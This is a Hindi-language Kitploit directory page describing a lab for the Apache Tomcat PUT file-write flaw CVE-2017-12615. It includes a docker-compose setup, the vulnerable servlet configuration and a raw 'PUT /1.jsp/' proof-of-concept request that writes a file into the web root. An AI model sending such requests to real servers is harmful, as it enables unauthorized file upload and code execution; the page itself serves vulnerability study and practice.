Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Tomcat-CVE-2017-12615 | Kitploit
उपकरण/GitHubGitHub/cyberharsh/tomcat-cve-2017-12615
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubcyberharsh/tomcat-cve-2017-12615

Tomcat-CVE-2017-12615

रिपॉजिटरी देखें
6 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PUT विधि के माध्यम से Tomcat मनमानी फ़ाइल-लेखन भेद्यता (CVE-2017-12615)

चीनी संस्करण

Tomcat संस्करण: 8.5.19

पर्यावरण सेटअप

root@kitploit:~
docker-compose build
docker-compose up -d

उपरोक्त कमांड सफलतापूर्वक चलाने के बाद, आप http://your-ip:8080 साइट पर जाकर Tomcat का उदाहरण पृष्ठ देख सकते हैं।

तर्क

संदर्भ लिंक:

  • http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
  • https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
  • https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e

Tomcat लेखन अनुमति(readonly=false)सेट करता है, जिसके परिणामस्वरूप हम सर्वर में फ़ाइलें लिख सकते हैं।

root@kitploit:~
<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>

हालाँकि Tomcat कुछ हद तक फ़ाइल एक्सटेंशन की जाँच करता है(सीधे jsp नहीं लिख सकते), फिर भी हम कुछ फ़ाइल सिस्टम सुविधाओं(जैसे Linux में / का उपयोग) के माध्यम से सीमा को बायपास कर सकते हैं।

POC

निम्नलिखित पैकेट सीधे भेजें और फिर शेल Web रूट निर्देशिका में लिख दिया जाएगा।

root@kitploit:~
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell

निम्नानुसार:

टूल डाउनलोड करें